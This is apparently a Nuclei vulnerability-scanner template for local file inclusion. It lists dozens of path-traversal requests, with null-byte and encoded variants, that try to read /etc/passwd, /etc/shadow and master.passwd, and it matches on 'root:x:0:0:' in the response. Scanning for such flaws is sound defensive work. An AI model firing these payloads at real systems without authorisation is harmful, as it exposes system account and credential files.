id: LFI

info:
  name: Local File Inclusion
  author: pikpikcu
  severity: high

requests:
  - method: GET
    path:
      - '{{BaseURL}}/etc/master.passwd'
      - '{{BaseURL}}/etc/%252Fpasspwd%3F'
      - '{{BaseURL}}/master.passwd'
      - '{{BaseURL}}/etc/passwd'
      - '{{BaseURL}}/etc/shadow%00'
      - '{{BaseURL}}/etc/passwd'
      - '{{BaseURL}}/etc/passwd%00'
      - '{{BaseURL}}../etc/passwd'
      - '{{BaseURL}}../etc/passwd%00'
      - '{{BaseURL}}../../etc/passwd'
      - '{{BaseURL}}../../etc/passwd%00'
      - '{{BaseURL}}../../../etc/passwd'
      - '{{BaseURL}}../../../etc/passwd%00'
      - '{{BaseURL}}../../../../etc/passwd'
      - '{{BaseURL}}../../../../etc/passwd%00'
      - '{{BaseURL}}../../../../../etc/passwd'
      - '{{BaseURL}}../../../../../etc/passwd%00'
      - '{{BaseURL}}../../../../../../etc/passwd'
      - '{{BaseURL}}../../../../../../etc/passwd%00'
      - '{{BaseURL}}../../../../../../../etc/passwd'
      - '{{BaseURL}}../../../../../../../etc/passwd%00'
      - '{{BaseURL}}../../../../../../../../etc/passwd'
      - '{{BaseURL}}../../../../../../../../etc/passwd%00'
      - '{{BaseURL}}../../../../../../../../../etc/passwd'
      - '{{BaseURL}}../../../../../../../../../etc/passwd%00'
      - '{{BaseURL}}../../../../../../../../../../etc/passwd'
      - '{{BaseURL}}../../../../../../../../../../etc/passwd%00'
      - '{{BaseURL}}../../../../../../../../../../../etc/passwd'
      - '{{BaseURL}}../../../../../../../../../../../etc/passwd%00'
      - '{{BaseURL}}../../../../../../../../../../../../etc/passwd'
      - '{{BaseURL}}../../../../../../../../../../../../etc/passwd%00'
      - '{{BaseURL}}../../../../../../../../../../../../../etc/passwd'
      - '{{BaseURL}}../../../../../../../../../../../../../etc/passwd%00'
      - '{{BaseURL}}../../../../../../../../../../../../../../etc/passwd'
      - '{{BaseURL}}../../../../../../../../../../../../../../etc/passwd%00'
      - '{{BaseURL}}../../../../../../../../../../../../../../../etc/passwd'
      - '{{BaseURL}}../../../../../../../../../../../../../../../etc/passwd%00'
      - '{{BaseURL}}../../../../../../../../../../../../../../../../etc/passwd'
      - '{{BaseURL}}../../../../../../../../../../../../../../../../etc/passwd%00'
      - '{{BaseURL}}../../../../../../../../../../../../../../../../../etc/passwd'
      - '{{BaseURL}}../../../../../../../../../../../../../../../../../etc/passwd%00'
      - '{{BaseURL}}../../../../../../../../../../../../../../../../../../etc/passwd'
      - '{{BaseURL}}../../../../../../../../../../../../../../../../../../etc/passwd%00'
      - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../etc/passwd'
      - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../etc/passwd%00'
      - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../etc/passwd'
      - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../etc/passwd%00'
      - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../../etc/passwd'
      - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../../etc/passwd%00'
      - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../../../etc/passwd'
      - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00'
      - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../../../etc/shadow%00'
      - '{{BaseURL}}../../../../../../etc/passwd&=%3C%3C%3C%3C'
      - '{{BaseURL}}../../../administrator/inbox'
      - '{{BaseURL}}../../../../../../../dev'     
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0:"
        part: body
